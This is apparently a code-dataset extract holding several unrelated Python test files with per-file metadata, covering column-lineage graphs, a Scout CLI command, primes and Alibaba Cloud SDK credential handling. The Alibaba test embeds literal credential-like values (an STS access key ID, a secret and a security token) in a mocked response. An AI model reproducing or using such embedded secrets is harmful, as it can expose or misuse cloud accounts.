("test", "default", "normalized_pagecounts", "page_title"),
("test", "default", "normalized_pagecounts", "page_url"),
("test", "default", "normalized_pagecounts", "views"),
("test", "default", "page", "page_id"),
("test", "default", "page", "page_latest"),
("test", "default", "page", "page_title"),
("test", "default", "page_lookup", "redirect_id"),
("test", "default", "page_lookup", "redirect_title"),
("test", "default", "page_lookup", "true_title"),
("test", "default", "page_lookup", "page_id"),
("test", "default", "page_lookup", "page_version"),
("test", "default", "page_lookup_nonredirect", "redirect_id"),
("test", "default", "page_lookup_nonredirect", "redirect_title"),
("test", "default", "page_lookup_nonredirect", "true_title"),
("test", "default", "page_lookup_nonredirect", "page_id"),
("test", "default", "page_lookup_nonredirect", "page_version"),
("test", "default", "page_lookup_redirect", "redirect_id"),
("test", "default", "page_lookup_redirect", "redirect_title"),
("test", "default", "page_lookup_redirect", "true_title"),
("test", "default", "page_lookup_redirect", "page_id"),
("test", "default", "page_lookup_redirect", "page_version"),
]
expected_edges = [
(
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_nonredirect", "redirect_id"),
),
(
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_nonredirect", "page_id"),
),
(
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_redirect", "redirect_id"),
),
(
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_redirect", "page_id"),
),
(
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_nonredirect", "redirect_title"),
),
(
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_nonredirect", "true_title"),
),
(
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_redirect", "redirect_title"),
),
(
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_redirect", "true_title"),
),
(
("test", "default", "page", "page_latest"),
("test", "default", "page_lookup_nonredirect", "page_version"),
),
(
("test", "default", "page", "page_latest"),
("test", "default", "page_lookup_redirect", "page_version"),
),
(
("test", "default", "page_lookup_redirect", "redirect_id"),
("test", "default", "page_lookup", "redirect_id"),
),
(
("test", "default", "page_lookup_redirect", "redirect_title"),
("test", "default", "page_lookup", "redirect_title"),
),
(
("test", "default", "page_lookup_redirect", "true_title"),
("test", "default", "page_lookup", "true_title"),
),
(
("test", "default", "page_lookup_redirect", "page_id"),
("test", "default", "page_lookup", "page_id"),
),
(
("test", "default", "page_lookup_redirect", "page_version"),
("test", "default", "page_lookup", "page_version"),
),
(
("test", "default", "page_lookup", "true_title"),
("test", "default", "normalized_pagecounts", "page_title"),
),
(
("test", "default", "page_lookup", "page_id"),
("test", "default", "normalized_pagecounts", "page_id"),
),
(
("test", "default", "filtered_pagecounts", "views"),
("test", "default", "normalized_pagecounts", "page_url"),
),
(
("test", "default", "filtered_pagecounts", "bytes_sent"),
("test", "default", "normalized_pagecounts", "views"),
),
]
assert [
(edge[0].fqdn, edge[1].fqdn) for edge in list(edges(graph.graph))
] == expected_edges
def test_column_sub_graph(get_graph):
graph, catalog = get_graph
table = catalog.get_table(
database_name="test",
schema_name="default",
table_name="page_lookup_nonredirect",
)
sub_graph = graph.sub_graphs(table)
assert [node.fqdn for node in list(nodes(sub_graph.graph))] == [
("test", "default", "page_lookup_nonredirect", "page_version"),
("test", "default", "page", "page_latest"),
("test", "default", "page_lookup_nonredirect", "page_id"),
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_nonredirect", "true_title"),
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_nonredirect", "redirect_title"),
("test", "default", "page_lookup_nonredirect", "redirect_id"),
]
assert set(
[(edge[0].fqdn, edge[1].fqdn) for edge in list(edges(sub_graph.graph))]
) == {
(
("test", "default", "page", "page_latest"),
("test", "default", "page_lookup_nonredirect", "page_version"),
),
(
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_nonredirect", "page_id"),
),
(
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_nonredirect", "redirect_id"),
),
(
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_nonredirect", "true_title"),
),
(
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_nonredirect", "redirect_title"),
),
}
@pytest.mark.skip(reason="Phases has not been thought through for columns")
def test_phases(get_graph):
graph, catalog = get_graph
phases = graph._phases()
assert [[node.fqdn for node in phase] for phase in list(phases)] == [
[("default", "page"), ("default", "redirect")],
[("default", "page_lookup_redirect"), ("default", "pagecounts")],
[("default", "page_lookup"), ("default", "filtered_pagecounts")],
[("default", "page_lookup_nonredirect"), ("default", "normalized_pagecounts")],
]
@pytest.mark.skip(reason="Phases has not been thought through for columns")
def test_node_positions(get_graph):
graph = get_graph
graph._set_node_positions(graph._phases())
assert graph.graph.nodes[("default", "page")]["pos"] == [0, 0]
assert graph.graph.nodes[("default", "pagecounts")]["pos"] == [1, 1]
assert graph.graph.nodes[("default", "redirect")]["pos"] == [0, 1]
assert graph.graph.nodes[("default", "filtered_pagecounts")]["pos"] == [2, 0]
assert graph.graph.nodes[("default", "page_lookup_nonredirect")]["pos"] == [3, 1]
assert graph.graph.nodes[("default", "page_lookup_redirect")]["pos"] == [1, 0]
assert graph.graph.nodes[("default", "page_lookup")]["pos"] == [2, 1]
assert graph.graph.nodes[("default", "normalized_pagecounts")]["pos"] == [3, 0]
@pytest.mark.skip(reason="Phases has not been thought through for columns")
def test_sub_graph_node_positions(get_graph):
graph = get_graph
sub_graph = graph.sub_graphs(("default", "normalized_pagecounts"))
sub_graph._set_node_positions(sub_graph._phases())
assert sub_graph.graph.nodes[("default", "normalized_pagecounts", "views")][
"pos"
] == [3, 4]
assert sub_graph.graph.nodes[("default", "normalized_pagecounts", "page_url")][
"pos"
] == [3, 3]
assert sub_graph.graph.nodes[("default", "normalized_pagecounts", "page_title")][
"pos"
] == [3, 2]
assert sub_graph.graph.nodes[("default", "normalized_pagecounts", "page_id")][
"pos"
] == [3, 1]
assert sub_graph.graph.nodes[("default", "normalized_pagecounts", "bytes_sent")][
"pos"
] == [3, 0]
assert sub_graph.graph.nodes[("default", "page_lookup", "true_title")]["pos"] == [
2,
3,
]
assert sub_graph.graph.nodes[("default", "page_lookup", "page_id")]["pos"] == [2, 2]
assert sub_graph.graph.nodes[("default", "filtered_pagecounts", "views")][
"pos"
] == [2, 1]
assert sub_graph.graph.nodes[("default", "filtered_pagecounts", "bytes_sent")][
"pos"
] == [2, 0]
assert sub_graph.graph.nodes[("default", "page_lookup_redirect", "true_title")][
"pos"
] == [1, 1]
assert sub_graph.graph.nodes[("default", "page_lookup_redirect", "page_id")][
"pos"
] == [1, 0]
assert sub_graph.graph.nodes[("default", "page", "page_title")]["pos"] == [0, 1]
assert sub_graph.graph.nodes[("default", "page", "page_id")]["pos"] == [0, 0]
| 38.251366
| 120
| 0.575071
| 1,476
| 14,000
| 5.181572
| 0.073171
| 0.155335
| 0.184362
| 0.167495
| 0.845188
| 0.8159
| 0.776412
| 0.746077
| 0.664487
| 0.617809
| 0
| 0.004807
| 0.242143
| 14,000
| 365
| 121
| 38.356164
| 0.716023
| 0
| 0
| 0.601227
| 0
| 0
| 0.371571
| 0.090357
| 0
| 0
| 0
| 0
| 0.101227
| 1
| 0.02454
| false
| 0
| 0.027607
| 0
| 0.052147
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
792c90a0d65fcffab114fdcf6114121cbe4930fe
| 1,164
|
py
|
Python
|
tests/commands/update/test_update_hpo_cmd.py
|
bjhall/scout
|
ea772cf8d233223e0ec5271f61b95d3afcf719ad
|
[
"BSD-3-Clause"
] | null | null | null |
tests/commands/update/test_update_hpo_cmd.py
|
bjhall/scout
|
ea772cf8d233223e0ec5271f61b95d3afcf719ad
|
[
"BSD-3-Clause"
] | null | null | null |
tests/commands/update/test_update_hpo_cmd.py
|
bjhall/scout
|
ea772cf8d233223e0ec5271f61b95d3afcf719ad
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from scout.commands import cli
from scout.server.extensions import store
def test_update_hpo(mock_app):
"""Tests the CLI that updates HPO terms in the database"""
runner = mock_app.test_cli_runner()
assert runner
# Test CLI base, no arguments provided
result = runner.invoke(cli, ["update", "hpo"])
assert result.exit_code == 1
assert "Are you sure you want to drop the hpo terms?" in result.output
# test propt confirm
result = runner.invoke(cli, ["update", "hpo"], input="y")
assert result.exit_code == 0
assert "INFO Time to load terms" in result.output
def test_update_hpo(mock_app):
"""Tests the CLI that updates HPO terms in the database"""
runner = mock_app.test_cli_runner()
assert runner
# Test CLI base, no arguments provided
result = runner.invoke(cli, ["update", "hpo"])
assert result.exit_code == 1
assert "Are you sure you want to drop the hpo terms?" in result.output
# test propt confirm
result = runner.invoke(cli, ["update", "hpo"], input="y")
assert result.exit_code == 0
assert "INFO Time to load terms" in result.output
| 29.846154
| 74
| 0.678694
| 174
| 1,164
| 4.448276
| 0.287356
| 0.069767
| 0.05168
| 0.108527
| 0.906977
| 0.906977
| 0.906977
| 0.906977
| 0.906977
| 0.906977
| 0
| 0.005459
| 0.213058
| 1,164
| 38
| 75
| 30.631579
| 0.83952
| 0.206186
| 0
| 0.9
| 0
| 0
| 0.189219
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f7552e0d1edb3f883a8635870463440f0fd4b1f8
| 239
|
py
|
Python
|
test_primes.py
|
chapman-cs510-2017f/cw-04-alice_keith
|
afb2f8cdb0d49182b274b41cb3d51be6d8ba6813
|
[
"MIT"
] | null | null | null |
test_primes.py
|
chapman-cs510-2017f/cw-04-alice_keith
|
afb2f8cdb0d49182b274b41cb3d51be6d8ba6813
|
[
"MIT"
] | null | null | null |
test_primes.py
|
chapman-cs510-2017f/cw-04-alice_keith
|
afb2f8cdb0d49182b274b41cb3d51be6d8ba6813
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import primes
def test_primes():
assert primes.eratosthenes(60) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59]
assert primes.eratosthenes(34) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]
| 34.142857
| 102
| 0.594142
| 45
| 239
| 3.133333
| 0.644444
| 0.170213
| 0.340426
| 0.056738
| 0.255319
| 0.255319
| 0.255319
| 0.255319
| 0.255319
| 0.255319
| 0
| 0.278947
| 0.205021
| 239
| 7
| 103
| 34.142857
| 0.463158
| 0.087866
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f759810b5e0ce6ff1019e469b93354818defe4a1
| 22,925
|
py
|
Python
|
python-function-test/alibabacloud_credentials_test.py
|
wallisyan/alibabacloud-python-sdk-v2
|
6e024c97cded2403025a7dd8fea8261e41872156
|
[
"Apache-2.0"
] | null | null | null |
python-function-test/alibabacloud_credentials_test.py
|
wallisyan/alibabacloud-python-sdk-v2
|
6e024c97cded2403025a7dd8fea8261e41872156
|
[
"Apache-2.0"
] | null | null | null |
python-function-test/alibabacloud_credentials_test.py
|
wallisyan/alibabacloud-python-sdk-v2
|
6e024c97cded2403025a7dd8fea8261e41872156
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Alibaba Cloud Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
from alibabacloud import get_client
from alibabacloud.client import AlibabaCloudClient
from alibabacloud.client import ClientConfig
from alibabacloud.credentials import AccessKeyCredentials
from alibabacloud.credentials.provider import RamRoleCredentialsProvider, \
DefaultChainedCredentialsProvider
from alibabacloud.exceptions import ServerException, PartialCredentialsException
from alibabacloud.request import APIRequest
from alibabacloud.vendored import requests
from base import SDKTestBase, MyServer
role_name = {u'Code': u'Success', u'LastUpdated': u'2019-04-09T10:41:31Z',
u'AccessKeyId': u'STS.NHLK9qYbdbKgs4oYTRXqjLSdX',
u'AccessKeySecret': u'J94mBKoeEUzDGwgUUsdXcf8hdbDm9Pht4A4R9vKParVT',
u'Expiration': u'2019-04-09T16:41:31Z',
u'SecurityToken': u'CAISigJ1q6Ft5B2yfSjIr4'
u'v5AIPFtL1F1YmMcRLevVQHVP5Go5bPujz2IHlFeXBoCekes/8'
u'yn29S6vwalrRtTtpfTEmBbI569s0M9hGjPZSQsM+n5qVUk5+1'
u'BjBe3ZEEFIqADd/iRfbxJ92PCTmd5AIRrJL+cTK9JS/HVbSCl'
u'Z9gaPkOQwC8dkAoLdxKJwxk2qR4XDmrQpTLCBPxhXfKB0dFox'
u'd1jXgFiZ6y2cqB8BHT/jaYo603392gcsj+NJc1ZssjA47oh7R'
u'MG/CfgHIK2X9j77xriaFIwzDDs+yGDkNZixf8aLOFr4Q3fFYh'
u'O/NnQPEe8KKkj5t1sffJnoHtzBJAIexOTzRtjFVtcH5xchqAA'
u'U8ECYWEiFKZtXwEpMnJUW4UXeXgzhMYDCeoLzrwQxcDwxpVEH'
u'KfA1zt+i/yAOXhJ1EgWwDPjyIeeFiR5VypJaHstnq/P0Jv/Uq'
u'ZAOS88KwDNLMHAc34HwmPNUnlsWc95B40ys91qtyHxQa1Jjjs'
u'LgE/S/5WyUQslQmuQI6e/rnT'}
class CredentialsTest(SDKTestBase):
def _init_client(self, service_name, api_version=None, region_id='cn-hangzhou'):
client = get_client(service_name=service_name, api_version=api_version,
region_id=region_id,
access_key_id=self.access_key_id,
access_key_secret=self.access_key_secret,
config=self.init_client_config())
return client
def test_call_request_with_client_env_priority(self):
self._create_default_ram_user()
self._create_access_key()
self._create_default_ram_role()
ram_role_arn_credential = RamRoleCredentialsProvider(
self.client_config,
AccessKeyCredentials(self.ram_user_access_key_id,
self.ram_user_access_key_secret),
self.ram_role_arn,
"alice_test")
client = AlibabaCloudClient(self.client_config, ram_role_arn_credential)
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"] = self.access_key_secret
response = client._handle_request(api_request)
response_credential = response.http_request.credentials
self.assertTrue(response_credential.access_key_id.startswith("STS."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_request_with_env_config_priority(self):
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_ID", self.access_key_id)
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_SECRET", self.access_key_secret)
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
env_credential_id = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_ID")
env_credential_secret = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
response_key_id = response.http_request.credentials.access_key_id
response_key_secret = response.http_request.credentials.access_key_secret
self.assertEqual(env_credential_id, response_key_id)
self.assertEqual(env_credential_secret, response_key_secret)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_ID")
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
def test_call_request_with_env_role_name_priority(self):
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_ID", self.access_key_id)
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_SECRET", self.access_key_secret)
os.environ.setdefault("ALIBABA_CLOUD_ROLE_NAME", self.default_ram_role_name)
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
env_credential_id = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_ID")
env_credential_secret = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
response_key_id = response.http_request.credentials.access_key_id
response_key_secret = response.http_request.credentials.access_key_secret
self.assertEqual(env_credential_id, response_key_id)
self.assertEqual(env_credential_secret, response_key_secret)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_ID")
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
os.environ.pop("ALIBABA_CLOUD_ROLE_NAME")
def test_call_request_with_config_role_name_priority(self):
os.environ["ALIBABA_CLOUD_ROLE_NAME"] = self.default_ram_role_name
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response_key_id = response.http_request.credentials.access_key_id
self.assertFalse(response_key_id.startswith("TST."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
os.environ.pop("ALIBABA_CLOUD_ROLE_NAME")
def test_call_rpc_request_with_introduction_ak(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
from alibabacloud.credentials import AccessKeyCredentials
self.assertEqual(type(response_credentials), AccessKeyCredentials)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_introduction_ak(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
from alibabacloud.credentials import AccessKeyCredentials
self.assertEqual(type(response_credentials), AccessKeyCredentials)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
def test_call_rpc_request_with_sts_token(self):
self._create_default_ram_user()
# self._attach_default_policy()
self._create_access_key()
self._create_default_ram_role()
acs_client = ClientConfig(region_id=self.region_id)
ram_role_arn_credential = RamRoleCredentialsProvider(
acs_client,
AccessKeyCredentials(self.ram_user_access_key_id,
self.ram_user_access_key_secret),
self.ram_role_arn,
"alice_test")
client = AlibabaCloudClient(acs_client, ram_role_arn_credential)
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
self.assertTrue(response_credentials.access_key_id.startswith("STS."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_ram_role(self):
self._create_default_ram_user()
# self._attach_default_policy()
self._create_access_key()
self._create_default_ram_role()
roa_client = ClientConfig(region_id=self.region_id)
ram_role_arn_credential = RamRoleCredentialsProvider(
roa_client,
AccessKeyCredentials(self.ram_user_access_key_id,
self.ram_user_access_key_secret),
self.ram_role_arn,
"alice_test")
client = AlibabaCloudClient(roa_client, ram_role_arn_credential)
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
self.assertTrue(response_credentials.access_key_id.startswith("STS."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
def test_call_rpc_request_with_env_ak(self):
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"] = self.access_key_secret
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_env_ak(self):
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"] = self.access_key_secret
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_ID")
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
@mock.patch("alibabacloud.credentials.provider.InstanceProfileCredentialsProvider")
def test_call_rpc_request_with_role_name(self, InstanceProfileCredentialsProvider):
with MyServer() as f:
os.environ["ALIBABA_CLOUD_ROLE_NAME"] = self.default_ram_role_name
InstanceProfileCredentialsProvider.rotate_credentials.return_value = \
requests.get(url="http://localhost:51352")
InstanceProfileCredentialsProvider.rotate_credentials. \
return_value = role_name
self.assertTrue(InstanceProfileCredentialsProvider.rotate_credentials)
def test_call_rpc_request_with_config_default(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_config_default(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
def test_call_rpc_request_with_key_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id="BadAccessKeyId",
access_key_secret=self.access_key_secret)
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "Ecs")
self.assertEqual(e.exception.http_status, 404)
self.assertEqual(e.exception.endpoint, "ecs-cn-hangzhou.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAccessKeyId.NotFound")
self.assertEqual(e.exception.error_message, "Specified access key is not found.")
def test_call_roa_request_with_key_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id="BadAccessKeyId",
access_key_secret=self.access_key_secret)
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "ROS")
self.assertEqual(e.exception.http_status, 404)
self.assertEqual(e.exception.endpoint, "ros.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAction.NotFound")
self.assertEqual(e.exception.error_message,
"Specified api is not found, please check your url and method.")
def test_call_rpc_request_with_secret_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id=self.access_key_id,
access_key_secret="BadAccessKeySecret")
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "Ecs")
self.assertEqual(e.exception.http_status, 400)
self.assertEqual(e.exception.endpoint, "ecs-cn-hangzhou.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAccessKeySecret")
self.assertEqual(e.exception.error_message,
"The AccessKeySecret is incorrect. "
"Please check your AccessKeyId and AccessKeySecret.")
def test_call_roa_request_with_secret_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id=self.access_key_id,
access_key_secret="BadAccessKeySecret")
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "ROS")
self.assertEqual(e.exception.http_status, 404)
self.assertEqual(e.exception.endpoint, "ros.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAction.NotFound")
self.assertEqual(e.exception.error_message,
"Specified api is not found, please check your url and method.")
def test_call_request_with_env_error(self):
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
client_config = ClientConfig(region_id=self.region_id)
with self.assertRaises(PartialCredentialsException) as e:
DefaultChainedCredentialsProvider(client_config)
self.assertEqual(e.exception.error_message,
"Partial credentials found in env, ALIBABA_CLOUD_ACCESS_KEY_SECRET is empty")
| 50.274123
| 102
| 0.687939
| 2,431
| 22,925
| 6.162073
| 0.101604
| 0.040254
| 0.024967
| 0.030841
| 0.838852
| 0.814887
| 0.799666
| 0.790053
| 0.781375
| 0.778505
| 0
| 0.015105
| 0.228964
| 22,925
| 455
| 103
| 50.384615
| 0.832372
| 0.027699
| 0
| 0.787402
| 0
| 0
| 0.144563
| 0.076547
| 0
| 0
| 0
| 0
| 0.149606
| 1
| 0.060367
| false
| 0
| 0.055118
| 0
| 0.131234
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
